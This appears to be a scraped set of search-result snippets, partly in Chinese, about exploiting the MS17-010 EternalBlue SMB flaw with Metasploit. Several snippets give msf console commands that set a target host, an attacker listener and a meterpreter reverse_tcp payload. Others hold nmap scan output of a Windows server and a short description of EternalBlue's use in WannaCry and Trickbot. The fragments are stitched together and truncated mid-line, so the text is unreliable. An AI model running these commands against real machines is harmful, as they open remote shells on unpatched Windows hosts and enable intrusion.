msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.0.3.65 rhost => 10.0.3.65 //设置攻击目标 msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //使用meterpreter,这个是好东西,可以提供很多有意思的功能,不设置也可以,不设置的话就是直接获取...
https://github.com/RiskSense-Ops/MS17-010 msf exploit(windows/smb/ms17_010_eternalblue) >setRHOST192.168.1.8 RHOST=>192.168.1.8 msf exploit(windows/smb/ms17_010_eternalblue) >setLHOST192.168.1.220 LHOST=>192.168.1.220 msf exploit(windows/smb/ms17_010_eternalblue) >setpayload windows/x64/m...
PORT STATE SERVICE21/tcpopenftp135/tcpopenmsrpc139/tcpopennetbios-ssn445/tcpopenmicrosoft-ds1433/tcpopenms-sql-s3389/tcpopenms-wbt-server8009/tcpopenajp138443/tcpopenhttps-alt49152/tcpopenunknown49153/tcpopenunknown49154/tcpopenunknown49155/tcpopenunknown49156/tcpopenunknown49157/tcpopenunknown MAC Addr...
Microsoft Windows Server 2008 R2, 2012 and R2, 2016 Information EternalBlue is an exploit that takes advantage of a vulnerability in Microsoft’s SMB v1.0. This exploit is now commonly used in malware to help spread it across a network. Some malware it has been used in is WannaCry, Trickbot...